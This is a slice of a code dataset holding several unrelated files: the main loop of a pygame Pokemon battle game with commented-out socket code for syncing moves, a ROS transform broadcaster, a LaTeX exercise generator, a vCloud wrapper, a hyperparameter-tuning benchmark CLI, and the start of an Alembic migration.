Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Absol01.png\", 1, '灾兽',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Absol01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Absol02.skills = (sabreDance02, shadowBall02, iceBeam02, kirin02)\r\n\r\n '''\r\n 灾兽初始化结束\r\n '''\r\n\r\n '''\r\n 闪电鸟初始化 3\r\n '''\r\n # 创建 我方闪电鸟\r\n Zapdos01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Zapdos01.png\", \"../othersource/Pic/headPortraits/Zapdos01.png\", 1, '闪电鸟',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Zapdos01.orderPos = (422, 110)\r\n\r\n # 创建 野生闪电鸟\r\n Zapdos02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Zapdos02.png\", None, 2, '闪电鸟',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Zapdos01.skills = (kirin01, fireBeam01, powerup01, lightning01)\r\n Zapdos02.skills = (kirin02, fireBeam02, powerup02, lightning02)\r\n\r\n '''\r\n 闪电鸟初始化结束\r\n '''\r\n\r\n '''\r\n 巨钳螳螂初始化 4\r\n '''\r\n # 创建 我方巨钳螳螂\r\n Scizor01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Scizor01.png\", \"../othersource/Pic/headPortraits/Scizor01.png\", 1, '巨钳螳螂',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Scizor01.orderPos = (50, 191)\r\n\r\n # 创建 野生巨钳螳螂\r\n Scizor02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Scizor02.png\", None, 2, '巨钳螳螂',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Scizor01.skills = (sabreDance01, bulletFist01, iceBeam01, fireKick01)\r\n Scizor02.skills = (sabreDance02, bulletFist02, iceBeam02, fireKick02)\r\n\r\n '''\r\n 巨钳螳螂初始化结束\r\n '''\r\n\r\n '''\r\n 九尾初始化 \r\n '''\r\n # 创建 野生九尾\r\n Ninetails02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Ninetails02.png\", None, 2, '九尾',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方九尾 无图\r\n # Ninetails01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Ninetails01.png\", 1, '九尾',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Ninetails01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Ninetails02.skills = (protection02, fireBeam02, powerup02, fireKick02)\r\n\r\n '''\r\n 九尾初始化结束\r\n '''\r\n\r\n '''\r\n 超梦初始化 \r\n '''\r\n # 创建 野生超梦\r\n Mewtwo02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Mewtwo02.png\", None, 2, '超梦',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方超梦 无图\r\n # Mewtwo01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Mewtwo01.png\", 1, '超梦',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Mewtwo01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Mewtwo02.skills = (kirin02, shadowBall02, iceBeam02, tsunami02)\r\n\r\n '''\r\n 超梦初始化结束\r\n '''\r\n\r\n '''\r\n 鲤鱼王初始化 \r\n '''\r\n # 创建 野生鲤鱼王\r\n Magikarp02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Magikarp02.png\", None, 2, '鲤鱼王',\r\n 999999999, 999999999, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方鲤鱼王 无图\r\n # Magikarp01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Magikarp01.png\", 1, '鲤鱼王',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Magikarp01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Magikarp02.skills = (splash02, splash02, splash02, splash02)\r\n\r\n '''\r\n 鲤鱼王初始化结束\r\n '''\r\n\r\n ''' \r\n 暴鲤龙初始化 5\r\n '''\r\n # 创建 我方暴鲤龙\r\n Gyarados01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Gyarados01.png\", \"../othersource/Pic/headPortraits/Gyarados01.png\", 1, '暴鲤龙',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Gyarados01.orderPos = (174, 191)\r\n\r\n # 创建 野生暴鲤龙\r\n Gyarados02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Gyarados02.png\", None, 2, '暴鲤龙',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Gyarados01.skills = (dragonClaw01, tsunami01, sabreDance01, waterfall01)\r\n Gyarados02.skills = (dragonClaw02, tsunami02, sabreDance02, waterfall02)\r\n\r\n '''\r\n 暴鲤龙初始化结束\r\n '''\r\n\r\n '''\r\n 古拉顿初始化 6\r\n '''\r\n # 创建 我方古拉顿\r\n Groudon01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Groudon01.png\", \"../othersource/Pic/headPortraits/Groudon01.png\", 1, '古拉顿',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Groudon01.orderPos = (298, 191)\r\n\r\n # 创建 野生古拉顿\r\n Groudon02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Groudon02.png\", None, 2, '古拉顿',\r\n 40, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Groudon01.skills = (fireKick01, fireBeam01, powerup01, protection01)\r\n Groudon02.skills = (fireKick02, fireBeam02, powerup02, protection02)\r\n\r\n '''\r\n 古拉顿初始化结束\r\n '''\r\n\r\n '''\r\n 沙奈朵初始化 7\r\n '''\r\n # # 创建 野生沙奈朵 无图\r\n # Gardevoir02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Gardevoir02.png\", 2, '沙奈朵',\r\n # 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 我方沙奈朵\r\n Gardevoir01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Gardevoir01.png\", \"../othersource/Pic/headPortraits/Gardevoir01.png\", 1, '沙奈朵',\r\n 400, 400, 120, 100, 150, 0, 100, 70, 80)\r\n Gardevoir01.orderPos = (422, 191)\r\n\r\n # 创建 技能组 对象\r\n Gardevoir01.skills = (hypnotism01, kirin01, powerup01, lightning01)\r\n # Gardevoir02.skills = (knock02, shadowBall02, powerup02, lightning02)\r\n\r\n '''\r\n 沙奈朵初始化结束\r\n '''\r\n\r\n '''\r\n 沙漠蜻蜓初始化 \r\n '''\r\n # 创建 野生沙漠蜻蜓\r\n Flygon02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Flygon02.png\", None, 2, '沙漠蜻蜓',\r\n 40, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方沙漠蜻蜓 无图\r\n # Flygon01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Flygon01.png\", 1, '沙漠蜻蜓',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Flygon01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Flygon02.skills = (fireBeam02, iceBeam02, powerup02, dragonClaw02)\r\n\r\n '''\r\n 沙漠蜻蜓初始化结束\r\n '''\r\n\r\n '''\r\n 喷火龙初始化 8\r\n '''\r\n # 创建 我方喷火龙\r\n Charizard01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Charizard01.png\", \"../othersource/Pic/headPortraits/Charizard01.png\", 1, '喷火龙',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Charizard01.orderPos = (50, 272)\r\n\r\n # 创建 野生喷火龙\r\n Charizard02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Charizard02.png\", None, 2, '喷火龙',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Charizard01.skills = (knock01, fireBeam01, powerup01, dragonClaw01)\r\n Charizard02.skills = (knock02, fireBeam02, powerup02, dragonClaw02)\r\n\r\n '''\r\n 喷火龙初始化结束\r\n '''\r\n\r\n '''\r\n 急冻鸟初始化 9\r\n '''\r\n # 创建 我方急冻鸟\r\n Articuno01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Articuno01.png\", \"../othersource/Pic/headPortraits/Articuno01.png\", 1, '急冻鸟',\r\n 400, 400, 120, 100, 150, 0, 100, 70, 80)\r\n Articuno01.orderPos = (174, 272)\r\n\r\n # 创建 野生急冻鸟\r\n Articuno02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Articuno02.png\", None, 2, '急冻鸟',\r\n 40, 400, 120, 100, 150, 0, 100, 637, 0)\r\n\r\n # 创建 技能组 对象\r\n Articuno01.skills = (dragonClaw01, kirin01, iceBeam01, lightning01)\r\n Articuno02.skills = (dragonClaw02, kirin02, iceBeam02, lightning02)\r\n\r\n '''\r\n 海皇牙初始化 10\r\n '''\r\n # 创建 我方海皇牙\r\n Kyogre01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Kyogre01.png\", \"../othersource/Pic/headPortraits/Kyogre01.png\", 1, '海皇牙',\r\n 400, 400, 120, 100, 150, 0, 100, 70, 80)\r\n Kyogre01.orderPos = (298, 272)\r\n\r\n # 创建 野生海皇牙\r\n Kyogre02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Kyogre02.png\", None, 2, '海皇牙',\r\n 40, 400, 120, 100, 150, 0, 100, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Kyogre01.skills = (iceBeam01, tsunami01, waterfall01, kirin01)\r\n Kyogre02.skills = (iceBeam02, tsunami02, waterfall02, kirin02)\r\n\r\n '''\r\n 皮卡丘初始化 11\r\n '''\r\n # 创建 我方皮卡丘\r\n Pikachu01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Pikachu01.png\", \"../othersource/Pic/headPortraits/Pikachu01.png\", 1, '皮卡丘',\r\n 400, 400, 120, 100, 150, 0, 100, 70, 80)\r\n Pikachu01.orderPos = (422, 272)\r\n\r\n # 创建 野生皮卡丘\r\n Pikachu02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Pikachu.png\", None, 2, '皮卡丘',\r\n 400, 400, 120, 100, 150, 0, 100, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Pikachu01.skills = (knock01, kirin01, fireBeam01, lightning01)\r\n Pikachu02.skills = (knock02, kirin02, fireBeam02, lightning02)\r\n\r\n '''\r\n 风速狗初始化 \r\n '''\r\n # 创建 野生风速狗 无图片\r\n # Arcanine02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Arcanine02.png\", 2, '风速狗',\r\n # 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 我方风速狗\r\n Arcanine01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Arcanine01.png\", None, 1, '风速狗',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n Arcanine01.skills = (tsunami01, fireBeam01, kirin01, lightning01)\r\n # Arcanine02.skills = (knock02, shadowBall02, powerup02, lightning02)\r\n\r\n '''\r\n 风速狗初始化结束\r\n '''\r\n\r\n # 我方可选的 pokemons\r\n opt_pokemon01s = (Zigzagoon01, Rayquaza01, Blaziken01, Zapdos01, Scizor01, Gyarados01,\r\n Groudon01, Gardevoir01, Charizard01, Articuno01, Kyogre01, Pikachu01)\r\n # 存放玩家选择的 pokemons\r\n myPokemon01s = []\r\n enemyPokemon02s = [Magikarp02]\r\n # 创建 选择界面的 指针\r\n selectionPointer = SelectionPointer(p_setting, screen)\r\n # 玩家选择 pokemon 设定 对战的两个宝可梦\r\n gf.selectPokemon(p_setting, screen, opt_pokemon01s,\r\n selectionPointer, myPokemon01s)\r\n pokemon01 = myPokemon01s[0] # 我方pokemon\r\n pokemon02 = enemyPokemon02s[0] # 敌方pokemon\r\n gf.setFight(pokemon01, pokemon02)\r\n\r\n # 创建 双方状态栏 对象\r\n statebar02 = Statebar(p_setting, screen, pokemon02)\r\n statebar01 = Statebar01(p_setting, screen, pokemon01)\r\n healthbar02 = Healthbar(\r\n p_setting, screen, pokemon02, p_setting.healthbarPos)\r\n healthbar01 = Healthbar(p_setting, screen, pokemon01,\r\n p_setting.healthbar01Pos)\r\n\r\n # 创建 指针 对象\r\n pointer = Pointer(p_setting, screen, menubar, pokemon02,\r\n pokemon01, statebar02, statebar01, healthbar02, healthbar01)\r\n\r\n # 创建 技能栏 对象\r\n skillbar = Skillbar(p_setting, screen, pointer)\r\n skillbar.skills = pokemon01.skills\r\n\r\n # 记录现在该显示在屏幕下方的 菜单栏or技能栏\r\n pointer.nowbar = menubar\r\n\r\n # 游戏开始 菜单栏右移进入 野生pokemon左移进入\r\n while menubar.rect.x < 0:\r\n menubar.rect.x += 2\r\n if pokemon02.rect.x >= 300:\r\n pokemon02.rect.x -= 2\r\n gf.update_screen(p_setting, screen, menubar,\r\n None, pokemon02, pointer.nowbar)\r\n\r\n # 文本提示 ”野生的蛇纹熊出现了!“\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon02.name + \" 出现了!\", pokemon02, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n\r\n # 文本提示 ”去吧 蛇纹熊!“\r\n screen.blit(menubar.image, menubar.rect) # 覆盖上一个文本\r\n gf.update_screen(p_setting, screen, menubar, \"去吧 \" +\r\n pokemon01.name + \" !\", pokemon02, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n\r\n sleepCount = 2\r\n\r\n # 游戏主循环\r\n while True:\r\n if state == 0:\r\n # 我方 选择 “战斗” menubar切换至 skillbar\r\n pointer.nowbar = menubar\r\n pointer.update()\r\n gf.update_screen(p_setting, screen, menubar, pokemon01.name +\r\n \" 想要干什么?\", statebar02, statebar01,\r\n healthbar02, healthbar01, pokemon02, pokemon01,\r\n pointer.nowbar, pointer)\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RETURN:\r\n pointer.nowbar = skillbar\r\n state = 1\r\n pointer.update()\r\n gf.update_screen(p_setting, screen, menubar, None,\r\n statebar02, statebar01, healthbar02,\r\n healthbar01, pokemon02, pokemon01,\r\n pointer.nowbar, pointer)\r\n\r\n if state == 1:\r\n # 我方 出招\r\n '''\r\n s = socket.socket()\r\n s.connect(('42.192.86.230', 8712))\r\n '''\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_UP:\r\n pointer.moveUp()\r\n if event.key == pygame.K_DOWN:\r\n pointer.moveDown()\r\n if event.key == pygame.K_LEFT:\r\n pointer.moveLeft()\r\n if event.key == pygame.K_RIGHT:\r\n pointer.moveRight()\r\n if event.key == pygame.K_RETURN:\r\n pointer.nowbar = menubar\r\n\r\n state = 2\r\n skillNum = pointer.flag\r\n '''\r\n s.send(str(skillNum).encode())\r\n s.close()\r\n '''\r\n pokemon01.useSkill(skillNum) # 我方出招\r\n healthbar02.update() # 更新 敌方血条\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon01.name + \" 使用了\" +\r\n pokemon01.skills[skillNum].name\r\n + \"!\", statebar02,\r\n statebar01, healthbar02, healthbar01,\r\n pokemon02, pokemon01, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n if pokemon01.state == 1:\r\n gf.update_screen(p_setting, screen, menubar,\r\n \"但是它失败了!\", statebar02,\r\n statebar01, healthbar02, healthbar01,\r\n pokemon02, pokemon01, pointer.nowbar)\r\n pokemon01.state = 0\r\n pygame.time.delay(1000)\r\n pointer.flag = 0\r\n\r\n if gf.checkDeath(pokemon02, p_setting, screen, pointer.nowbar, menubar,\r\n statebar02, statebar01, healthbar02, healthbar01) == -1:\r\n '''\r\n s = socket.socket()\r\n s.connect(('42.192.86.230', 8712))\r\n s.send('-1'.encode())\r\n s.close()\r\n '''\r\n enemyPokemon02s.remove(enemyPokemon02s[0])\r\n if len(enemyPokemon02s) == 0:\r\n exit(0)\r\n else:\r\n pokemon02 = enemyPokemon02s[0]\r\n gf.setFight(pokemon01, pokemon02)\r\n pokemon02.rect.x = 300\r\n # 创建 双方状态栏 对象\r\n statebar02 = Statebar(p_setting, screen, pokemon02)\r\n statebar01 = Statebar01(p_setting, screen, pokemon01)\r\n healthbar02 = Healthbar(\r\n p_setting, screen, pokemon02, p_setting.healthbarPos)\r\n healthbar01 = Healthbar(p_setting, screen, pokemon01,\r\n p_setting.healthbar01Pos)\r\n healthbar02.update()\r\n healthbar01.update()\r\n # 创建 指针 对象\r\n pointer = Pointer(p_setting, screen, menubar, pokemon02,\r\n pokemon01, statebar02, statebar01, healthbar02, healthbar01)\r\n\r\n # 创建 技能栏 对象\r\n skillbar = Skillbar(p_setting, screen, pointer)\r\n skillbar.skills = pokemon01.skills\r\n\r\n # 记录现在该显示在屏幕下方的 菜单栏or技能栏\r\n pointer.nowbar = menubar\r\n screen.blit(menubar.image, menubar.rect) # 覆盖上一个文本\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon02.name + \" 出现了!\", pokemon02, pokemon01, pointer.nowbar)\r\n state = 0\r\n pygame.time.delay(1000)\r\n\r\n if state == 2:\r\n # 敌方 出招\r\n state = 0\r\n if pokemon02.state < 0:\r\n pokemon02.state += 1\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon02.name + \" 睡着了\" +\r\n \"!\", statebar02, statebar01,\r\n healthbar02, healthbar01, pokemon02,\r\n pokemon01, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n continue\r\n skillNum = random.randint(0, 3)\r\n '''\r\n while True:\r\n choice = 0\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RETURN:\r\n s = socket.socket()\r\n s.connect(('42.192.86.230', 8712))\r\n skillNum = int(s.recv(1024).decode())\r\n s.close()\r\n choice = 1\r\n break\r\n if choice == 1:\r\n break\r\n '''\r\n # if skillNum != -1:\r\n pokemon02.useSkill(skillNum) # 敌方 出招\r\n healthbar01.update() # 更新 我方血条\r\n gf.update_screen(p_setting, screen, menubar,\r\n pokemon02.name + \" 使用了\" +\r\n pokemon02.skills[skillNum].name +\r\n \"!\", statebar02, statebar01,\r\n healthbar02, healthbar01, pokemon02,\r\n pokemon01, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n\r\n if gf.checkDeath(pokemon01, p_setting, screen, pointer.nowbar, menubar,\r\n statebar02, statebar01, healthbar02, healthbar01) == -1:\r\n '''\r\n s = socket.socket()\r\n s.connect(('42.192.86.230', 8712))\r\n s.send('-1'.encode())\r\n s.close()\r\n '''\r\n myPokemon01s.remove(myPokemon01s[0])\r\n if len(myPokemon01s) == 0:\r\n exit(0)\r\n else:\r\n pokemon01 = myPokemon01s[0]\r\n gf.setFight(pokemon01, pokemon02)\r\n for skill in pokemon01.skills:\r\n skill.nowPP = skill.maxPP\r\n # 创建 双方状态栏 对象\r\n statebar02 = Statebar(p_setting, screen, pokemon02)\r\n statebar01 = Statebar01(p_setting, screen, pokemon01)\r\n healthbar02 = Healthbar(\r\n p_setting, screen, pokemon02, p_setting.healthbarPos)\r\n healthbar01 = Healthbar(p_setting, screen, pokemon01,\r\n p_setting.healthbar01Pos)\r\n\r\n # 创建 指针 对象\r\n pointer = Pointer(p_setting, screen, menubar, pokemon02,\r\n pokemon01, statebar02, statebar01, healthbar02, healthbar01)\r\n\r\n # 创建 技能栏 对象\r\n skillbar = Skillbar(p_setting, screen, pointer)\r\n skillbar.skills = pokemon01.skills\r\n\r\n # 记录现在该显示在屏幕下方的 菜单栏or技能栏\r\n pointer.nowbar = menubar\r\n healthbar01.update()\r\n healthbar02.update()\r\n screen.blit(menubar.image, menubar.rect) # 覆盖上一个文本\r\n gf.update_screen(p_setting, screen, menubar, \"去吧 \" +\r\n pokemon01.name + \" !\", pokemon02, pointer.nowbar)\r\n pygame.time.delay(1000)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"trainingMode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590126250","text":"#!/usr/bin/env python\nimport rospy\n\nimport tf\nimport tf2_ros\nimport geometry_msgs.msg\nimport math\nfrom sensor_msgs.msg import Imu\nfrom geometry_msgs.msg import Quaternion\n\nclass PositionBroadcaster:\n\n\tdef __init__(self):\n\t\t#setup broadcaster\n\t\trospy.init_node('position_broadcaster')\n\t\tself.broadcaster = tf2_ros.TransformBroadcaster()\n\t\t\n\t\t#initial position broadcast\n\t\tself.transform = geometry_msgs.msg.TransformStamped()\n\t\t\n\t\tself.transform.header.stamp = rospy.Time.now()\n\t\tself.transform.header.frame_id = \"world\"\n\t\tself.transform.child_frame_id = \"base_link\"\n\n\t\tself.transform.transform.translation.x = 0\n\t\tself.transform.transform.translation.y = 0\n\t\tself.transform.transform.translation.z = 0\n\n\t\tquat = tf.transformations.quaternion_from_euler(0, 0, 0)\n\t\tself.transform.transform.rotation.x = quat[0]\n\t\tself.transform.transform.rotation.y = quat[1]\n\t\tself.transform.transform.rotation.z = quat[2]\n\t\tself.transform.transform.rotation.w = quat[3]\n\n\t\tself.broadcaster.sendTransform(self.transform)\n\n\t\t#wheel position updates:\n\t\tself.wheel1 = geometry_msgs.msg.TransformStamped()\n\t\t\n\t\tself.wheel1.header.stamp = rospy.Time.now()\n\t\tself.wheel1.header.frame_id = \"base_link\"\n\t\tself.wheel1.child_frame_id = \"left_wheel\"\n\n\t\tself.wheel1.transform.translation.x = 0\n\t\tself.wheel1.transform.translation.y = 0\n\t\tself.wheel1.transform.translation.z = 0\n\n\t\tself.wheel1.transform.rotation.x = quat[0]\n\t\tself.wheel1.transform.rotation.y = quat[1]\n\t\tself.wheel1.transform.rotation.z = quat[2]\n\t\tself.wheel1.transform.rotation.w = quat[3]\n\n\t\tself.broadcaster.sendTransform(self.wheel1)\n\n\t\tself.wheel2 = geometry_msgs.msg.TransformStamped()\n\t\t\n\t\tself.wheel2.header.stamp = rospy.Time.now()\n\t\tself.wheel2.header.frame_id = \"base_link\"\n\t\tself.wheel2.child_frame_id = \"right_wheel\"\n\n\t\tself.wheel2.transform.translation.x = 0\n\t\tself.wheel2.transform.translation.y = 0\n\t\tself.wheel2.transform.translation.z = 0\n\n\t\tself.wheel2.transform.rotation.x = quat[0]\n\t\tself.wheel2.transform.rotation.y = quat[1]\n\t\tself.wheel2.transform.rotation.z = quat[2]\n\t\tself.wheel2.transform.rotation.w = quat[3]\n\n\t\tself.broadcaster.sendTransform(self.wheel2)\n\t\t\n\t\t#setup callback on IMU messages\n\t\trospy.Subscriber(\"imu\", Imu, self.update_position)\n\t\t\n\t\tr = rospy.Rate(10)\n\t\twhile not rospy.is_shutdown():\n\t\t\tself.periodic()\n\t\t\tr.sleep()\n\t\t\n\tdef update_position(self, msg):\n\t\tself.transform.transform.rotation = Quaternion(*tf.transformations.unit_vector([0, 0, msg.orientation.z, msg.orientation.w]))\n\n\tdef periodic(self):\n\t\tstamp = rospy.Time.now()\n\t\tself.transform.header.stamp = stamp\n\t\tself.wheel1.header.stamp = stamp\n\t\tself.wheel2.header.stamp = stamp\n\t\tself.broadcaster.sendTransform(self.transform)\n\t\tself.broadcaster.sendTransform(self.wheel1)\n\t\tself.broadcaster.sendTransform(self.wheel2)\n\n\nif __name__ == '__main__':\n\tpb = PositionBroadcaster()\n\trospy.spin()\n","sub_path":"scripts/positioning/position_broadcaster.py","file_name":"position_broadcaster.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"473989320","text":"from elemCalc import *\nimport random\n\nopg = open(\"opgaver.tex\",\"w\")\nlos = open(\"løsninger.tex\",\"w\")\n\n\npreamble = open(\"preamble.tex\",\"r\")\nfor line in preamble:\n opg.write(line)\n los.write(line)\npreamble.close()\n\nopg_list = []\n\nfor i in range(100):\n opg_list.append(multiply())\n\nfor o in opg_list:\n opg.write(\"\\\\begin{opg}\\n\")\n los.write(\"\\\\begin{opg}\\n\")\n opg.write(o.exercise() + \"\\n\")\n los.write(o.exercise() + \"\\n\")\n opg.write(\"\\\\end{opg}\\n\")\n los.write(\"\\\\end{opg}\\n\")\n los.write(\"\\\\begin{los}\\n\")\n los.write(o.solution() + \"\\n\")\n los.write(\"\\end{los}\\n\")\n\n\nopg.write(\"\\\\end{document}\")\nlos.write(\"\\\\end{document}\")\n\nopg.close()\nlos.close()\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"572270817","text":"from vcloudutil.WFBSSvCloud import WFBSSvCloud\n\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass WFBSSvCloudLibrary():\n \n ROBOT_LIBRARY_SCOPE = \"GLOBAL\"\n \n def __init__(self):\n self.vcloudutil = WFBSSvCloud()\n \n def do_vcloud_operation(self, **kwargs):\n self.vcloudutil.do_vcloud_operation(**kwargs)\n \nif __name__ == \"__main__\":\n \"\"\"\n \"\"\"\n logging.basicConfig(level=logging.DEBUG)\n try:\n vcloud = WFBSSvCloudLibrary()\n kargs=dict(map(lambda x: x.lstrip('-').split('='),sys.argv[1:])) if len(sys.argv) > 1 else dict()\n vcloud.do_vcloud_operation(**kargs)\n except:\n _logger.error(\"operation failed\")\n \n ","sub_path":"res/lib/WFBSSvCloudLibrary/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"564477555","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport logging\nimport sys\nimport warnings\n\nimport tabulate\n\nfrom btb_benchmark.main import run_benchmark, summarize_results\n\n\ndef _run(args):\n # Logger setup\n log_level = (3 - args.verbose) * 10\n fmt = '%(asctime)s - %(process)d - %(levelname)s - %(name)s - %(module)s - %(message)s'\n logging.basicConfig(level=log_level, format=fmt)\n logging.getLogger(\"botocore\").setLevel(logging.ERROR)\n logging.getLogger(\"hyperopt\").setLevel(logging.ERROR)\n logging.getLogger(\"ax\").setLevel(logging.ERROR)\n logging.getLogger(\"urllib3\").setLevel(logging.CRITICAL)\n\n # run\n results = run_benchmark(\n args.tuners,\n args.challenge_types,\n args.challenges,\n args.sample,\n args.iterations,\n args.max_rows,\n args.output_path,\n args.detailed_output,\n )\n\n if not args.output_path:\n print(tabulate.tabulate(\n results,\n tablefmt='github',\n headers=results.columns\n ))\n\n\ndef _summary(args):\n summarize_results(args.input, args.output)\n\n\ndef _get_parser():\n parser = argparse.ArgumentParser(description='BTB Benchmark Command Line Interface')\n parser.set_defaults(action=None)\n action = parser.add_subparsers(title='action')\n action.required = True\n\n # Run action\n run = action.add_parser('run', help='Run the BTB Benchmark')\n run.set_defaults(action=_run)\n run.set_defaults(user=None)\n\n run.add_argument('-v', '--verbose', action='count', default=0,\n help='Be verbose. Use -vv for increased verbosity.')\n run.add_argument('-o', '--output-path', type=str, required=False,\n help='Path to the CSV file where the report will be dumped')\n run.add_argument('-s', '--sample', type=int,\n help='Run only on a subset of the available datasets of the given size.')\n run.add_argument('-i', '--iterations', type=int, default=100,\n help='Number of iterations to perform per challenge with each candidate.')\n run.add_argument('-c', '--challenges', nargs='+',\n help='Challenge/s to be used. Accepts multiple names.')\n run.add_argument('-t', '--tuners', nargs='+',\n help='Tuner/s to be benchmarked. Accepts multiple names.')\n run.add_argument('-C', '--challenge-types', nargs='+',\n choices=['math', 'sgd', 'random_forest', 'xgboost'],\n help='Type of challenge/s to use. Accepts multiple names.')\n run.add_argument('-m', '--max-rows', type=int,\n help='Max amount of rows to use for each dataset.')\n run.add_argument('-d', '--detailed-output', action='store_true',\n help='Output a detailed dataset with elapsed times.')\n\n # Summarize action\n summary = action.add_parser('summary', help='Summarize the BTB Benchmark results')\n summary.set_defaults(action=_summary)\n summary.add_argument('input', nargs='+', help='Input path with results.')\n summary.add_argument('output', help='Output file.')\n\n return parser\n\n\ndef main():\n warnings.filterwarnings(\"ignore\")\n\n # Parse args\n parser = _get_parser()\n if len(sys.argv) < 2:\n parser.print_help()\n sys.exit(0)\n\n args = parser.parse_args()\n\n args.action(args)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"benchmark/btb_benchmark/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"227388595","text":"\"\"\"empty message\n\nRevision ID: c8f0aec2f0f7\nRevises: None\nCreate Date: 2016-02-26 03:08:32.182555\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'c8f0aec2f0f7'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please 